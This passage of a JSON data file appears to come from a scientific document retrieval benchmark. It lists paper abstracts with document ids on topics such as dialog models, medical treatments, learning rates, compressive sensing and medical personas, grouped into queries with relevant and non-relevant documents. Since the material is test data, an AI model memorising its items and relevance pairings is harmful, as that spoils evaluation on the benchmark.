"text": "We propose an online, end-to-end, neural generative conversational model for open-domain dialog. It is trained using a unique combination of offline two-phase supervised learning and online human-inthe-loop active learning. While most existing research proposes offline supervision or hand-crafted reward functions for online reinforcement, we devise a novel interactive learning mechanism based on a diversity-promoting heuristic for response generation and one-character userfeedback at each step. Experiments show that our model inherently promotes the generation of meaningful, relevant and interesting responses, and can be used to train agents with customized personas, moods and conversational styles.",
"title": ""
},
{
"docid": "2a45f4ed21d9534a937129532cb32020",
"text": "BACKGROUND\nCore stability training has grown in popularity over 25 years, initially for back pain prevention or therapy. Subsequently, it developed as a mode of exercise training for health, fitness and sport. The scientific basis for traditional core stability exercise has recently been questioned and challenged, especially in relation to dynamic athletic performance. Reviews have called for clarity on what constitutes anatomy and function of the core, especially in healthy and uninjured people. Clinical research suggests that traditional core stability training is inappropriate for development of fitness for heath and sports performance. However, commonly used methods of measuring core stability in research do not reflect functional nature of core stability in uninjured, healthy and athletic populations. Recent reviews have proposed a more dynamic, whole body approach to training core stabilization, and research has begun to measure and report efficacy of these modes training. The purpose of this study was to assess extent to which these developments have informed people currently working and participating in sport.\n\n\nMETHODS\nAn online survey questionnaire was developed around common themes on core stability training as defined in the current scientific literature and circulated to a sample population of people working and participating in sport. Survey results were assessed against key elements of the current scientific debate.\n\n\nRESULTS\nPerceptions on anatomy and function of the core were gathered from a representative cohort of athletes, coaches, sports science and sports medicine practitioners (n = 241), along with their views on effectiveness of various current and traditional exercise training modes. Most popular method of testing and measuring core function was subjective assessment through observation (43%), while a quarter (22%) believed there was no effective method of measurement. Perceptions of people in sport reflect the scientific debate, and practitioners have adopted a more functional approach to core stability training. There was strong support for loaded, compound exercises performed upright, compared to moderate support for traditional core stability exercises. Half of the participants (50%) in the survey, however, still support a traditional isolation core stability training.\n\n\nCONCLUSION\nPerceptions in applied practice on core stability training for dynamic athletic performance are aligned to a large extent to the scientific literature.",
"title": ""
},
{
"docid": "b4d7974ca20b727e8c361826f24861d4",
"text": "We introduce gvnn, a neural network library in Torch aimed towards bridging the gap between classic geometric computer vision and deep learning. Inspired by the recent success of Spatial Transformer Networks, we propose several new layers which are often used as parametric transformations on the data in geometric computer vision. These layers can be inserted within a neural network much in the spirit of the original spatial transformers and allow backpropagation to enable end-toend learning of a network involving any domain knowledge in geometric computer vision. This opens up applications in learning invariance to 3D geometric transformation for place recognition, end-to-end visual odometry, depth estimation and unsupervised learning through warping with a parametric transformation for image reconstruction error.",
"title": ""
},
{
"docid": "56205e79e706e05957cb5081d6a8348a",
"text": "Corpus-based set expansion (i.e., finding the “complete” set of entities belonging to the same semantic class, based on a given corpus and a tiny set of seeds) is a critical task in knowledge discovery. It may facilitate numerous downstream applications, such as information extraction, taxonomy induction, question answering, and web search. To discover new entities in an expanded set, previous approaches either make one-time entity ranking based on distributional similarity, or resort to iterative pattern-based bootstrapping. The core challenge for these methods is how to deal with noisy context features derived from free-text corpora, which may lead to entity intrusion and semantic drifting. In this study, we propose a novel framework, SetExpan, which tackles this problem, with two techniques: (1) a context feature selection method that selects clean context features for calculating entity-entity distributional similarity, and (2) a ranking-based unsupervised ensemble method for expanding entity set based on denoised context features. Experiments on three datasets show that SetExpan is robust and outperforms previous state-of-the-art methods in terms of mean average precision.",
"title": ""
},
{
"docid": "48a3c9d1f41f9b7ed28f8ef46b5c4533",
"text": "We introduce two new methods of deriving the classical PCA in the framework of minimizing the mean square error upon performing a lower-dimensional approximation of the data. These methods are based on two forms of the mean square error function. One of the novelties of the presented methods is that the commonly employed process of subtraction of the mean of the data becomes part of the solution of the optimization problem and not a pre-analysis heuristic. We also derive the optimal basis and the minimum error of approximation in this framework and demonstrate the elegance of our solution in comparison with a recent solution in the framework.",
"title": ""
},
{
"docid": "83bdb6760483dd5f5ad45725cd61b7e7",
"text": "Gaucher disease (GD, ORPHA355) is a rare, autosomal recessive genetic disorder. It is caused by a deficiency of the lysosomal enzyme, glucocerebrosidase, which leads to an accumulation of its substrate, glucosylceramide, in macrophages. In the general population, its incidence is approximately 1/40,000 to 1/60,000 births, rising to 1/800 in Ashkenazi Jews. The main cause of the cytopenia, splenomegaly, hepatomegaly, and bone lesions associated with the disease is considered to be the infiltration of the bone marrow, spleen, and liver by Gaucher cells. Type-1 Gaucher disease, which affects the majority of patients (90% in Europe and USA, but less in other regions), is characterized by effects on the viscera, whereas types 2 and 3 are also associated with neurological impairment, either severe in type 2 or variable in type 3. A diagnosis of GD can be confirmed by demonstrating the deficiency of acid glucocerebrosidase activity in leukocytes. Mutations in the GBA1 gene should be identified as they may be of prognostic value in some cases. Patients with type-1 GD-but also carriers of GBA1 mutation-have been found to be predisposed to developing Parkinson's disease, and the risk of neoplasia associated with the disease is still subject to discussion. Disease-specific treatment consists of intravenous enzyme replacement therapy (ERT) using one of the currently available molecules (imiglucerase, velaglucerase, or taliglucerase). Orally administered inhibitors of glucosylceramide biosynthesis can also be used (miglustat or eliglustat).",
"title": ""
},
{
"docid": "f0bc66d306f0c08f09798b210cbcab73",
"text": "the identification of eye diseases in retinal image is the subject of several researches in the field of medical image processing. this research proposed a computerized aid diagnosis system to help specialists by displaying useful information such as the location of abnormalities in fundus images This paper is a survey of techniques for Automatic detection of retina image now a days it is plying a vital role in screening tool. This procedure helps to detect various kind of risks and diseases of eyes. Identification of Glaucoma using fundus images involves the measurement of the size, shape of the Optic cup and Neuroretinal rim One of the most common diseases which cause blindness is glaucoma. Early detection of this disease is essential to prevent the permanent blindness. Screenings of glaucoma based on digital images of the retina have been performed in the past few years. Several techniques are there to detect the anomaly of retina due to glaucoma. The key image processing techniques are image registration, image fusion, image segmentation, feature extraction, image enhancement, morphology, pattern matching, image classification, analysis and statistical measurements. The main idea behind this paper is to illustrate a system which is mainly based on image processing and classification techniques for automatic detection of glaucoma by comparing and measuring different parameters of fundus images of glaucoma patients and normal patients. Keywords—Glaucoma, Cup to disk ratio, Neuroretinalrim Fundus Image, ISNT (inferior, superior, nasal, temporal quadrants), ANN, K-Means Clustering, Thresholding, CDR, ISNT, SVM, Bayesian.",
"title": ""
},
{
"docid": "01d90d3bc978c7f97b47adb75df475d3",
"text": "It is known that the learning rate is the most important hyper-parameter to tune for training deep neural networks. This paper describes a new method for setting the learning rate, named cyclical learning rates, which practically eliminates the need to experimentally find the best values and schedule for the global learning rates. Instead of monotonically decreasing the learning rate, this method lets the learning rate cyclically vary between reasonable boundary values. Training with cyclical learning rates instead of fixed values achieves improved classification accuracy without a need to tune and often in fewer iterations. This paper also describes a simple way to estimate \"reasonable bounds\" – linearly increasing the learning rate of the network for a few epochs. In addition, cyclical learning rates are demonstrated on the CIFAR-10 and CIFAR-100 datasets with ResNets, Stochastic Depth networks, and DenseNets, and the ImageNet dataset with the AlexNet and GoogLeNet architectures. These are practical tools for everyone who trains neural networks.",
"title": ""
},
{
"docid": "fc431a3c46bdd4fa4ad83b9af10c0922",
"text": "The importance of the kidney's role in glucose homeostasis has gained wider understanding in recent years. Consequently, the development of a new pharmacological class of anti-diabetes agents targeting the kidney has provided new treatment options for the management of type 2 diabetes mellitus (T2DM). Sodium glucose co-transporter type 2 (SGLT2) inhibitors, such as dapagliflozin, canagliflozin, and empagliflozin, decrease renal glucose reabsorption, which results in enhanced urinary glucose excretion and subsequent reductions in plasma glucose and glycosylated hemoglobin concentrations. Modest reductions in body weight and blood pressure have also been observed following treatment with SGLT2 inhibitors. SGLT2 inhibitors appear to be generally well tolerated, and have been used safely when given as monotherapy or in combination with other oral anti-diabetes agents and insulin. The risk of hypoglycemia is low with SGLT2 inhibitors. Typical adverse events appear to be related to the presence of glucose in the urine, namely genital mycotic infection and lower urinary tract infection, and are more often observed in women than in men. Data from long-term safety studies with SGLT2 inhibitors and from head-to-head SGLT2 inhibitor comparator studies are needed to fully determine their benefit-risk profile, and to identify any differences between individual agents. However, given current safety and efficacy data, SGLT2 inhibitors may present an attractive option for T2DM patients who are failing with metformin monotherapy, especially if weight is part of the underlying treatment consideration.",
"title": ""
},
{
"docid": "3ec26d404b5aaa5636c995e188ae6b52",
"text": "This paper presents a study of using ellipsoidal decision regions for motif-based patterned fabric defect detection, the result of which is found to improve the original detection success using max–min decision region of the energy-variance values. In our previous research, max–min decision region was found to be effective in distinct cases but ill detect the ambiguous false-positive and false-negative cases. To alleviate this problem, we first assume that the energy-variance values can be described by a Gaussian mixture model. Second, we apply k-means clustering to roughly identify the various clusters that make up the entire data population. Third, convex hull of each cluster is employed as a basis for fitting an ellipsoidal decision region over it. Defect detection is then based on these ellipsoidal regions. To validate the method, three wallpaper groups are evaluated using the new ellipsoidal regions, and compared with those results obtained using the max–min decision region. For the p2 group, success rate improves from 93.43% to 100%. For the pmm group, success rate improves from 95.9% to 96.72%, while the p4 m group records the same success rate at 90.77%. This demonstrates the superiority of using ellipsoidal decision regions in motif-based defect detection. & 2009 Elsevier Ltd. All rights reserved.",
"title": ""
},
{
"docid": "faa1a49f949d5ba997f4285ef2e708b2",
"text": "Appendiceal mucinous neoplasms sometimes present with peritoneal dissemination, which was previously a lethal condition with a median survival of about 3 years. Traditionally, surgical treatment consisted of debulking that was repeated until no further benefit could be achieved; systemic chemotherapy was sometimes used as a palliative option. Now, visible disease tends to be removed through visceral resections and peritonectomy. To avoid entrapment of tumour cells at operative sites and to destroy small residual mucinous tumour nodules, cytoreductive surgery is combined with intraperitoneal chemotherapy with mitomycin at 42 degrees C. Fluorouracil is then given postoperatively for 5 days. If the mucinous neoplasm is minimally invasive and cytoreduction complete, these treatments result in a 20-year survival of 70%. In the absence of a phase III study, this new combined treatment should be regarded as the standard of care for epithelial appendiceal neoplasms and pseudomyxoma peritonei syndrome.",
"title": ""
},
{
"docid": "a1196d8624026339f66e843df68469d0",
"text": "Two or more isoforms of several cytokines including tumor necrosis factors (tnfs) have been reported from teleost fish. Although zebrafish (Danio rerio) and medaka (Oryzias latipes) possess two tnf-α genes, their genomic location and existence are yet to be described and confirmed. Therefore, we conducted in silico identification, synteny analysis of tnf-α and tnf-n from both the fish with that of human TNF/lymphotoxin loci and their expression analysis in zebrafish. We identified two homologs of tnf-α (named as tnf-α1 and tnf-α2) and a tnf-n gene from zebrafish and medaka. Genomic location of these genes was found to be as: tnf-α1, and tnf-n and tnf-α2 genes on zebrafish chromosome 19 and 15 and medaka chromosome 11 and 16, respectively. Several features such as existence of TNF family signature, conservation of genes in TNF loci with human chromosome, phylogenetic clustering and amino acid similarity with other teleost TNFs confirmed their identity as tnf-α and tnf-n. There were a constitutive expression of all three genes in different tissues, and an increased expression of tnf-α1 and -α2 and a varied expression of tnf-n ligand in zebrafish head kidney cells induced with 20 μg mL(-1) LPS in vitro. Our results suggest the presence of two tnf-α homologs on different chromosomes of zebrafish and medaka and correlate this incidence arising from the fish whole genome duplication event.",
"title": ""
},
{
"docid": "8609f49cc78acc1ba25e83c8e68040a6",
"text": "Time series shapelets are small, local patterns in a time series that are highly predictive of a class and are thus very useful features for building classifiers and for certain visualization and summarization tasks. While shapelets were introduced only recently, they have already seen significant adoption and extension in the community. Despite their immense potential as a data mining primitive, there are two important limitations of shapelets. First, their expressiveness is limited to simple binary presence/absence questions. Second, even though shapelets are computed offline, the time taken to compute them is significant. In this work, we address the latter problem by introducing a novel algorithm that finds shapelets in less time than current methods by an order of magnitude. Our algorithm is based on intelligent caching and reuse of computations, and the admissible pruning of the search space. Because our algorithm is so fast, it creates an opportunity to consider more expressive shapelet queries. In particular, we show for the first time an augmented shapelet representation that distinguishes the data based on conjunctions or disjunctions of shapelets. We call our novel representation Logical-Shapelets. We demonstrate the efficiency of our approach on the classic benchmark datasets used for these problems, and show several case studies where logical shapelets significantly outperform the original shapelet representation and other time series classification techniques. We demonstrate the utility of our ideas in domains as diverse as gesture recognition, robotics, and biometrics.",
"title": ""
},
{
"docid": "012e08734efe6af83faef4703a092b16",
"text": "Dunlap and Van Liere’s New Environmental Paradigm (NEP) Scale, published in 1978, has become a widely used measure of proenvironmental orientation. This article develops a revised NEP Scale designed to improve upon the original one in several respects: (1) It taps a wider range of facets of an ecological worldview, (2) It offers a balanced set of proand anti-NEP items, and (3) It avoids outmoded terminology. The new scale, termed the New Ecological Paradigm Scale, consists of 15 items. Results of a 1990 Washington State survey suggest that the items can be treated as an internally consistent summated rating scale and also indicate a modest growth in pro-NEP responses among Washington residents over the 14 years since the original study.",
"title": ""
},
{
"docid": "94a2c522f65627eb36e8dd0b56db5461",
"text": "Humans have a unique ability to learn more than one language — a skill that is thought to be mediated by functional (rather than structural) plastic changes in the brain. Here we show that learning a second language increases the density of grey matter in the left inferior parietal cortex and that the degree of structural reorganization in this region is modulated by the proficiency attained and the age at acquisition. This relation between grey-matter density and performance may represent a general principle of brain organization.",
"title": ""
},
{
"docid": "6e5e7dbff8030de9c0a8e9cac353430a",
"text": "Learning effective fusion of multi-modality features is at the heart of visual question answering. We propose a novel method of dynamically fusing multi-modal features with intraand inter-modality information flow, which alternatively pass dynamic information between and across the visual and language modalities. It can robustly capture the high-level interactions between language and vision domains, thus significantly improves the performance of visual question answering. We also show that the proposed dynamic intra-modality attention flow conditioned on the other modality can dynamically modulate the intramodality attention of the target modality, which is vital for multimodality feature fusion. Experimental evaluations on the VQA 2.0 dataset show that the proposed method achieves state-of-the-art VQA performance. Extensive ablation studies are carried out for the comprehensive analysis of the proposed method.",
"title": ""
}
] | scidocsrr |
7cdcdab23ea993e9a435da2271f3b024 | Compressive sensing: From theory to applications, a survey | [
{
"docid": "c6a44d2313c72e785ae749f667d5453c",
"text": "Donoho and Johnstone (1992a) proposed a method for reconstructing an unknown function f on [0; 1] from noisy data di = f(ti) + zi, i = 0; : : : ; n 1, ti = i=n, zi iid N(0; 1). The reconstruction f̂ n is de ned in the wavelet domain by translating all the empirical wavelet coe cients of d towards 0 by an amount p 2 log(n) = p n. We prove two results about that estimator. [Smooth]: With high probability f̂ n is at least as smooth as f , in any of a wide variety of smoothness measures. [Adapt]: The estimator comes nearly as close in mean square to f as any measurable estimator can come, uniformly over balls in each of two broad scales of smoothness classes. These two properties are unprecedented in several ways. Our proof of these results develops new facts about abstract statistical inference and its connection with an optimal recovery model.",
"title": ""
}
] | [
{
"docid": "7ec33dfb4321acbada95b6a6ac38f1ea",
"text": "A chatterbot or chatbot aims to make a conversation between both human and machine. The machine has been embedded knowledge to identify the sentences and making a decision itself as response to answer a question. The response principle is matching the input sentence from user. From input sentence, it will be scored to get the similarity of sentences, the higher score obtained the more similar of reference sentences. The sentence similarity calculation in this paper using bigram which divides input sentence as two letters of input sentence. The knowledge of chatbot are stored in the database. The chatbot consists of core and interface that is accessing that core in relational database management systems (RDBMS). The database has been employed as knowledge storage and interpreter has been employed as stored programs of function and procedure sets for pattern-matching requirement. The interface is standalone which has been built using programing language of Pascal and Java.",
"title": ""
},
{
"docid": "ce8fea47b1f323d39185403705500687",
"text": "Today, there is a big veriety of different approaches and algorithms of data filtering and recommendations giving. In this paper we describe traditional approaches and explane what kind of modern approaches have been developed lately. All the paper long we will try to explane approaches and their problems based on a movies recommendations. In the end we will show the main challanges recommender systems come across.",
"title": ""
},
{
"docid": "4625d09122eb2e42a201503405f7abfa",
"text": "OBJECTIVE\nTo summarize 16 years of National Collegiate Athletic Association (NCAA) injury surveillance data for 15 sports and to identify potential modifiable risk factors to target for injury prevention initiatives.\n\n\nBACKGROUND\nIn 1982, the NCAA began collecting standardized injury and exposure data for collegiate sports through its Injury Surveillance System (ISS). This special issue reviews 182 000 injuries and slightly more than 1 million exposure records captured over a 16-year time period (1988-1989 through 2003-2004). Game and practice injuries that required medical attention and resulted in at least 1 day of time loss were included. An exposure was defined as 1 athlete participating in 1 practice or game and is expressed as an athlete-exposure (A-E).\n\n\nMAIN RESULTS\nCombining data for all sports, injury rates were statistically significantly higher in games (13.8 injuries per 1000 A-Es) than in practices (4.0 injuries per 1000 A-Es), and preseason practice injury rates (6.6 injuries per 1000 A-Es) were significantly higher than both in-season (2.3 injuries per 1000 A-Es) and postseason (1.4 injuries per 1000 A-Es) practice rates. No significant change in game or practice injury rates was noted over the 16 years. More than 50% of all injuries were to the lower extremity. Ankle ligament sprains were the most common injury over all sports, accounting for 15% of all reported injuries. Rates of concussions and anterior cruciate ligament injuries increased significantly (average annual increases of 7.0% and 1.3%, respectively) over the sample period. These trends may reflect improvements in identification of these injuries, especially for concussion, over time. Football had the highest injury rates for both practices (9.6 injuries per 1000 A-Es) and games (35.9 injuries per 1000 A-Es), whereas men's baseball had the lowest rate in practice (1.9 injuries per 1000 A-Es) and women's softball had the lowest rate in games (4.3 injuries per 1000 A-Es).\n\n\nRECOMMENDATIONS\nIn general, participation in college athletics is safe, but these data indicate modifiable factors that, if addressed through injury prevention initiatives, may contribute to lower injury rates in collegiate sports.",
"title": ""
},
{
"docid": "299f24e2ef6cc833d008656a5d8e4552",
"text": "In computational intelligence, the term ‘memetic algorithm’ has come to be associated with the algorithmic pairing of a global search method with a local search method. In a sociological context, a ‘meme’ has been loosely defined as a unit of cultural information, the social analog of genes for individuals. Both of these definitions are inadequate, as ‘memetic algorithm’ is too specific, and ultimately a misnomer, as much as a ‘meme’ is defined too generally to be of scientific use. In this paper, we extend the notion of memes from a computational viewpoint and explore the purpose, definitions, design guidelines and architecture for effective memetic computing. Utilizing two conceptual case studies, we illustrate the power of high-order meme-based learning. With applications ranging from cognitive science to machine learning, memetic computing has the potential to provide much-needed stimulation to the field of computational intelligence by providing a framework for higher order learning.",
"title": ""
},
{
"docid": "0a8c009d1bccbaa078f95cc601010af3",
"text": "Deep neural networks (DNNs) have transformed several artificial intelligence research areas including computer vision, speech recognition, and natural language processing. However, recent studies demonstrated that DNNs are vulnerable to adversarial manipulations at testing time. Specifically, suppose we have a testing example, whose label can be correctly predicted by a DNN classifier. An attacker can add a small carefully crafted noise to the testing example such that the DNN classifier predicts an incorrect label, where the crafted testing example is called adversarial example. Such attacks are called evasion attacks. Evasion attacks are one of the biggest challenges for deploying DNNs in safety and security critical applications such as self-driving cars.\n In this work, we develop new DNNs that are robust to state-of-the-art evasion attacks. Our key observation is that adversarial examples are close to the classification boundary. Therefore, we propose region-based classification to be robust to adversarial examples. Specifically, for a benign/adversarial testing example, we ensemble information in a hypercube centered at the example to predict its label. In contrast, traditional classifiers are point-based classification, i.e., given a testing example, the classifier predicts its label based on the testing example alone. Our evaluation results on MNIST and CIFAR-10 datasets demonstrate that our region-based classification can significantly mitigate evasion attacks without sacrificing classification accuracy on benign examples. Specifically, our region-based classification achieves the same classification accuracy on testing benign examples as point-based classification, but our region-based classification is significantly more robust than point-based classification to state-of-the-art evasion attacks.",
"title": ""
},
{
"docid": "2f98ed3e1ddc2eee9b8e4309c125a925",
"text": "With the rise of social networking sites (SNSs), individuals not only disclose personal information but also share private information concerning others online. While shared information is co-constructed by self and others, personal and collective privacy boundaries become blurred. Thus there is an increasing concern over information privacy beyond the individual perspective. However, limited research has empirically examined if individuals are concerned about privacy loss not only of their own but their social ties’; nor is there an established instrument for measuring the collective aspect of individuals’ privacy concerns. In order to address this gap in existing literature, we propose a conceptual framework of individuals’ collective privacy concerns in the context of SNSs. Drawing on the Communication Privacy Management (CPM) theory (Petronio, 2002), we suggest three dimensions of collective privacy concerns, namely, collective information access, control and diffusion. This is followed by the development and empirical validation of a preliminary scale of SNS collective privacy concerns (SNSCPC). Structural model analyses confirm the three-dimensional conceptualization of SNSCPC and reveal antecedents of SNS users’ concerns over violations of the collective privacy boundaries. This paper serves as a starting point for theorizing privacy as a collective notion and for understanding online information disclosure as a result of social interaction and group influence.",
"title": ""
},
{
"docid": "1fd00838f916cbace1d1ff63dc7d8fad",
"text": "Multiple-burner induction-heating cooking appliances are suitable for using multiple-output inverters. Some common approaches use several single-output inverters or a single-output inverter multiplexing the loads along the time periodically. By specifying a two-output series-resonant high-frequency inverter, a new inverter is obtained fulfilling the requirements. The synthesized converter can be considered as a two-output extension of a full-bridge topology. It allows the control of the two outputs, simultaneously and independently, up to their rated powers saving component count compared with the two-converter solution and providing a higher utilization of electronics. To verify theoretical predictions, the proposed converter is designed and tested experimentally in an induction-heating appliance prototype. A fixed-frequency control strategy is digitally implemented with good final performances for the application, including ZVS operation for active devices and a quick heating function. Although the work is focused on low-power induction heating, it can be probably useful for other power electronic applications.",
"title": ""
},
{
"docid": "846905c567dfddfab0b8c4ee60cc283b",
"text": "Social media sentiment analysis (also known as opinion mining) which aims to extract people’s opinions, attitudes and emotions from social networks has become a research hotspot. Conventional sentiment analysis concentrates primarily on the textual content. However, multimedia sentiment analysis has begun to receive attention since visual content such as images and videos is becoming a new medium for self-expression in social networks. In order to provide a reference for the researchers in this active area, we give an overview of this topic and describe the algorithms of sentiment analysis and opinion mining for social multimedia. Having conducted a brief review on textual sentiment analysis for social media, we present a comprehensive survey of visual sentiment analysis on the basis of a thorough investigation of the existing literature. We further give a summary of existing studies on multimodal sentiment analysis which combines multiple media channels. We finally summarize the existing benchmark datasets in this area, and discuss the future research trends and potential directions for multimedia sentiment analysis. This survey covers 100 articles during 2008–2018 and categorizes existing studies according to the approaches they adopt.",
"title": ""
},
{
"docid": "e16560ee4e0d6e62fee3421d4d94f74f",
"text": "Industries keep a check on all statistics of their business and process this data using various data mining techniques to measure profit trends, revenue, growing markets and interesting opportunities to invest. These statistical records keep on increasing and increase very fast. Unfortunately, as the data grows it becomes a tedious task to process such a large data set and extract meaningful information. Also if the data generated is in various formats, its processing possesses new challenges. Owing to its size, big data is stored in Hadoop Distributed File System (HDFS). In this standard architecture, all the Data Nodes function parallel but functioning of a single Data Node is still in sequential fashion. This paper proposes to execute tasks assigned to a single Data Node in parallel instead of executing them sequentially. We propose to use a bunch of streaming multi-processors (SMs) for each single Data Node. An SM can have various processors and memory and all SMs run in parallel and independently. We process big data which may be coming from different sources in different formats to run parallelly on a Hadoop cluster, use the proposed technique and yield desired results efficiently. We have applied proposed methodology to the raw data of an industrial firm, for doing intelligent business, with a final objective of finding profit generated for the firm and its trends throughout a year. We have done analysis over a yearlong data as trends generally repeat after a year.",
"title": ""
},
{
"docid": "11c4f0610d701c08516899ebf14f14c4",
"text": "Histone post-translational modifications impact many aspects of chromatin and nuclear function. Histone H4 Lys 20 methylation (H4K20me) has been implicated in regulating diverse processes ranging from the DNA damage response, mitotic condensation, and DNA replication to gene regulation. PR-Set7/Set8/KMT5a is the sole enzyme that catalyzes monomethylation of H4K20 (H4K20me1). It is required for maintenance of all levels of H4K20me, and, importantly, loss of PR-Set7 is catastrophic for the earliest stages of mouse embryonic development. These findings have placed PR-Set7, H4K20me, and proteins that recognize this modification as central nodes of many important pathways. In this review, we discuss the mechanisms required for regulation of PR-Set7 and H4K20me1 levels and attempt to unravel the many functions attributed to these proteins.",
"title": ""
},
{
"docid": "ff4d7c7aa17f5925e5514aef9e0963f9",
"text": "We present a novel concept for wideband, wide-scan phased array applications. The array is composed by connected-slot elements loaded with artificial dielectric superstrates. The proposed solution consists of a single multi-layer planar printed circuit board (PCB) and does not require the typically employed vertical arrangement of multiple PCBs. This offers advantages in terms of complexity of the assembly and cost of the array. We developed an analytical method for the prediction of the array performance, in terms of active input impedance. This method allows to estimate the relevant parameters of the array with a negligible computational cost. A design example with a bandwidth exceeding one octave (VSWR<;2 from 6.5 to 14.3) and scanning up to 50 degrees for all azimuth planes is presented.",
"title": ""
},
{
"docid": "7d6c441d745adf8a7f6d833da9e46716",
"text": "X-ray computed tomography is a widely used method for nondestructive visualization of the interior of different samples - also of wooden material. Different to usual applications very high resolution is needed to use such CT images in dendrochronology and to evaluate wood species. In dendrochronology big samples (up to 50 cm) are necessary to scan. The needed resolution is - depending on the species - about 20 mum. In wood identification usually very small samples have to be scanned, but wood anatomical characters of less than 1 mum in width have to be visualized. This paper deals with four examples of X-ray CT scanned images to be used for dendrochronology and wood identification.",
"title": ""
},
{
"docid": "1607e3f1b44093f0d5f9940b6e391579",
"text": "Craniofacial characteristics in two groups of children were compared. In one group (n = 22) the children had Angle Class II division 2 malocclusion combined with extreme deep bite. The other group (n = 25) was composed of children with ideal occlusion. The mean ages of the children were 12.8 and 12.9 years respectively. In the Class II-2 group the distance between gonion and B-point was underdeveloped, causing B-point to have a retruded position in relation to both A-point and cranial base. The Class II-2 children also had a retroclination of the symphysis, which gave the B-point a retruded position in relation to pogonion. As for vertical dimensions, Class II-2 children had a smaller anterior lower facial height than normal. Furthermore, Class II-2 had a discrepancy between the maxillary incisal and molar heights, i.e. a slightly larger incisal height and a slightly smaller molar height. Finally, children with Class II-2 had a high lip line and a very large interincisal angle. Three variables--the sagittal distance between points A and B, the inclination of the symphysis, and the relationship between the maxillary incisal and molar heights--in combination, differentiated nearly 100% correctly between Class II-2 and normal occlusion.",
"title": ""
},
{
"docid": "01fbdd81917cba76851cd566d6f0b1da",
"text": "Flexible hybrid electronics (FHE), designed in wearable and implantable configurations, have enormous applications in advanced healthcare, rapid disease diagnostics, and persistent human-machine interfaces. Soft, contoured geometries and time-dynamic deformation of the targeted tissues require high flexibility and stretchability of the integrated bioelectronics. Recent progress in developing and engineering soft materials has provided a unique opportunity to design various types of mechanically compliant and deformable systems. Here, we summarize the required properties of soft materials and their characteristics for configuring sensing and substrate components in wearable and implantable devices and systems. Details of functionality and sensitivity of the recently developed FHE are discussed with the application areas in medicine, healthcare, and machine interactions. This review concludes with a discussion on limitations of current materials, key requirements for next generation materials, and new application areas.",
"title": ""
},
{
"docid": "fcbf97bfbcf63ee76f588a05f82de11e",
"text": "The Deliberation without Attention (DWA) effect refers to apparent improvements in decision-making following a period of distraction. It has been presented as evidence for beneficial unconscious cognitive processes. We identify two major concerns with this claim: first, as these demonstrations typically involve subjective preferences, the effects of distraction cannot be objectively assessed as beneficial; second, there is no direct evidence that the DWA manipulation promotes unconscious decision processes. We describe two tasks based on the DWA paradigm in which we found no evidence that the distraction manipulation led to decision processes that are subjectively unconscious, nor that it reduced the influence of presentation order upon performance. Crucially, we found that a lack of awareness of decision process was associated with poorer performance, both in terms of subjective preference measures used in traditional DWA paradigm and in an equivalent task where performance can be objectively assessed. Therefore, we argue that reliance on conscious memory itself can explain the data. Thus the DWA paradigm is not an adequate method of assessing beneficial unconscious thought.",
"title": ""
},
{
"docid": "a57aa7ff68f7259a9d9d4d969e603dcd",
"text": "Society has changed drastically over the last few years. But this is nothing new, or so it appears. Societies are always changing, just as people are always changing. And seeing as it is the people who form the societies, a constantly changing society is only natural. However something more seems to have happened over the last few years. Without wanting to frighten off the reader straight away, we can point to a diversity of social developments that indicate that the changes seem to be following each other faster, especially over the last few decades. We can for instance, point to the pluralisation (or a growing versatility), differentialisation and specialisation of society as a whole. On a more personal note, we see the diversification of communities, an emphasis on emancipation, individualisation and post-materialism and an increasing wish to live one's life as one wishes, free from social, religious or ideological contexts.",
"title": ""
},
{
"docid": "58d61334bbad1447ac844a0cfd11b9da",
"text": "Much has been written on creating personas --- both what they are good for, and how to create them. A common problem with personas is that they are not based on real customer data, and if they are, the data set is not of a sample size that can be considered statistically significant. In this paper, we describe a new method for creating and validating personas, based on the statistical analysis of data, which is fast and cost effective.",
"title": ""
},
{
"docid": "621ccb0c477255108583505cde0f9eb3",
"text": "As a collective and highly dynamic social group, the human crowd is a fascinating phenomenon that has been frequently studied by experts from various areas. Recently, computer-based modeling and simulation technologies have emerged to support investigation of the dynamics of crowds, such as a crowd's behaviors under normal and emergent situations. This article assesses the major existing technologies for crowd modeling and simulation. We first propose a two-dimensional categorization mechanism to classify existing work depending on the size of crowds and the time-scale of the crowd phenomena of interest. Four evaluation criteria have also been introduced to evaluate existing crowd simulation systems from the point of view of both a modeler and an end-user.\n We have discussed some influential existing work in crowd modeling and simulation regarding their major features, performance as well as the technologies used in this work. We have also discussed some open problems in the area. This article will provide the researchers with useful information and insights on the state of the art of the technologies in crowd modeling and simulation as well as future research directions.",
"title": ""
},
{
"docid": "89460f94140b9471b120674ddd904948",
"text": "Cross-disciplinary research on collective intelligence considers that groups, like individuals, have a certain level of intelligence. For example, the study by Woolley et al. (2010) indicates that groups which perform well on one type of task will perform well on others. In a pair of empirical studies of groups interacting face-to-face, they found evidence of a collective intelligence factor, a measure of consistent group performance across a series of tasks, which was highly predictive of performance on a subsequent, more complex task. This collective intelligence factor differed from the individual intelligence of group members, and was significantly predicted by members’ social sensitivity – the ability to understand the emotions of others based on visual facial cues (Baron-Cohen et al. 2001).",
"title": ""
},
{
"docid": "90b1d5b2269f742f9028199c34501043",
"text": "Motivated by the desire to construct compact (in terms of expected length to be traversed to reach a decision) decision trees, we propose a new node splitting measure for decision tree construction. We show that the proposed measure is convex and cumulative and utilize this in the construction of decision trees for classification. Results obtained from several datasets from the UCI repository show that the proposed measure results in decision trees that are more compact with classification accuracy that is comparable to that obtained using popular node splitting measures such as Gain Ratio and the Gini Index. 2008 Published by Elsevier Inc.",
"title": ""
}
] | scidocsrr |
1fc0ffd8316652539c1e8af4fdde86aa | Medical Persona Classification in Social Media | [
{
"docid": "7ff11b2ba0be98489efed796086e7908",
"text": "It is still an open question where to search for complying a specific information need due to the large amount and diversity of information available. In this paper, a content analysis of health-related information provided in the Web is performed to get an overview on the medical content available. In particular, the content of medical Question & Answer Portals, medical weblogs, medical reviews and Wikis is compared. For this purpose, medical concepts are extracted from the text material with existing extraction technology. Based on these concepts, the content of the different knowledge resources is compared. Since medical weblogs describe experiences as well as information, it is of large interest to be able to distinguish between informative and affective posts. For this reason, a method to classify blogs based on their information content is presented, which exploits high-level features describing the medical and affective content of blog posts. The results show that there are substantial differences in the content of various health-related Web resources. Weblogs and answer portals mainly deal with diseases and medications. The Wiki and the encyclopedia provide more information on anatomy and procedures. While patients and nurses describe personal aspects of their life, doctors aim to present health-related information in their blog posts. The knowledge on content differences and information content can be exploited by search engines to improve ranking, search and to direct users to appropriate knowledge sources. 2009 Elsevier Inc. 